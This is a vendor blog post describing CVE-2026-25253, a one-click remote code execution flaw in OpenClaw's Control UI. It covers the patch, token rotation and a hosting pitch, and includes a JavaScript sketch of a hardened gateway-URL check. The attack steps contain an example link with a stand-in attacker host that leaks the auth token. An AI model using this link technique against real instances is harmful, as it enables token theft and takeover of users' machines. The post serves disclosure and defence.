CVE-2026-25253: One-Click RCE in OpenClaw and What You Should Know

ClawHosters by Daniel Samer
3 min read

A single malicious link. That is all it takes to get full command execution on an unpatched OpenClaw instance. CVE-2026-25253 landed on the NVD on February 1, 2026, carrying a CVSS score of 8.8 (HIGH). Security researcher Mav Levin at DepthFirst discovered the flaw, and Belgium's CCB issued a "Patch Immediately" advisory shortly after.

With 149,000+ GitHub stars and an estimated 42,665 publicly exposed instances, this is not a niche problem.

How the Attack Works

The exploit chains four steps. All of them happen in milliseconds.

  1. The attacker sends the victim a link containing ?gatewayUrl=attacker.com/ws.
  2. OpenClaw's Control UI reads that URL parameter and auto-connects, forwarding the auth token to the attacker's server.
  3. The attacker uses the stolen token to connect back via WebSocket. Browsers do not apply the same-origin policy to WebSocket connections, so the connection succeeds without any warning.
  4. With a valid token in hand, the attacker disables safety features and runs arbitrary commands on the host machine.

The scary part? Even localhost-bound instances are vulnerable. Your browser runs on the same machine, so it can reach localhost:18789 just fine. The attacker never needs direct network access to your server. Your own browser is the bridge.

The Numbers Are Bad

BitSight detected 18,000+ publicly reachable OpenClaw instances within 48 hours of disclosure. A broader scan found 42,665 exposed instances, with 5,194 actively verified as vulnerable.

Think about what a typical OpenClaw instance has access to. iMessage and WhatsApp integrations. Slack channels. Stripe API keys. Auth tokens. Source code. One click, and all of that is exposed.

The Fix

OpenClaw v2026.1.29, released January 30, 2026, added a gateway URL confirmation modal. The UI no longer silently connects to whatever URL a query parameter tells it to.

If you run OpenClaw yourself, update to v2026.1.29 or later right now. Then rotate your auth tokens and any API keys your instance can access. Assume they were compromised if you were running an older version with an exposed port.
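The weak behaviour from the four steps above, beside the hardened handling that the confirmation modal in v2026.1.29 stands for, as an added illustration that is not OpenClaw's own code: the function names, the trusted-origin list and the sample URLs are hypothetical; only the localhost port comes from the article.

```javascript
// Added illustration, not OpenClaw's code. Shows the weak "trust the query
// parameter" pattern and a hardened resolver that never auto-connects to an
// untrusted gateway origin. Names and sample URLs are hypothetical.
const DEFAULT_GATEWAY = "ws://localhost:18789/ws"; // port from the article

// Weak pattern: whatever ?gatewayUrl= says becomes the gateway, so the auth
// token is sent wherever the author of the link chose.
function resolveGatewayUrlUnsafe(search) {
  return new URLSearchParams(search).get("gatewayUrl") || DEFAULT_GATEWAY;
}

// Hardened pattern. Returns { url, action } where action is:
//   "connect" - default gateway or a trusted origin, safe to auto-connect
//   "confirm" - syntactically valid but untrusted; the UI must show a
//               confirmation modal before any credential is sent
//   "reject"  - not an absolute ws:/wss: URL, or carries embedded credentials
function resolveGatewayUrl(search, trustedOrigins = [new URL(DEFAULT_GATEWAY).origin]) {
  const raw = new URLSearchParams(search).get("gatewayUrl");
  if (raw === null) return { url: DEFAULT_GATEWAY, action: "connect" };
  let parsed;
  try {
    parsed = new URL(raw); // no base URL: relative or scheme-less input throws
  } catch {
    return { url: null, action: "reject" };
  }
  if (parsed.protocol !== "ws:" && parsed.protocol !== "wss:") {
    return { url: null, action: "reject" };
  }
  if (parsed.username || parsed.password) {
    return { url: null, action: "reject" };
  }
  if (trustedOrigins.includes(parsed.origin)) {
    return { url: parsed.href, action: "connect" };
  }
  return { url: parsed.href, action: "confirm" };
}

// The token is only placed in the first frame once the decision is
// "connect"; a "confirm" result must first pass the user's explicit approval.
function firstAuthFrame(resolved, token) {
  return resolved.action === "connect" ? { type: "auth", token } : null;
}
```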

ClawHosters Customers Were Not Affected

If you run your OpenClaw instance through ClawHosters managed hosting plans, you were already protected before this CVE went public. Our security architecture means managed instances get automatic updates, the gateway is never exposed directly to browser traffic, and container isolation prevents lateral movement even if something does go wrong.

For a deeper look at the protections we apply by default, check our security hardening guide and the built-in safety scanner that ships with every instance.

Frequently Asked Questions

It is a one-click remote code execution vulnerability in OpenClaw's Control UI. An attacker tricks the victim into clicking a link that steals their auth token via WebSocket. The attacker then uses that token to run arbitrary commands on the host. CVSS score is 8.8 (HIGH).

Yes. The attack uses your own browser as a bridge. Since your browser runs on the same machine, it can reach localhost just fine. The attacker never needs direct access to your network.

Update to OpenClaw v2026.1.29 or later. After updating, rotate all auth tokens and API keys your instance has access to. If you want to skip patch management entirely, consider a managed hosting plan where updates are applied automatically.

*Last updated: February 2026*

Sources

  1. CVE-2026-25253
  2. ClawHosters managed hosting plans
  3. security architecture
  4. security hardening guide
  5. built-in safety scanner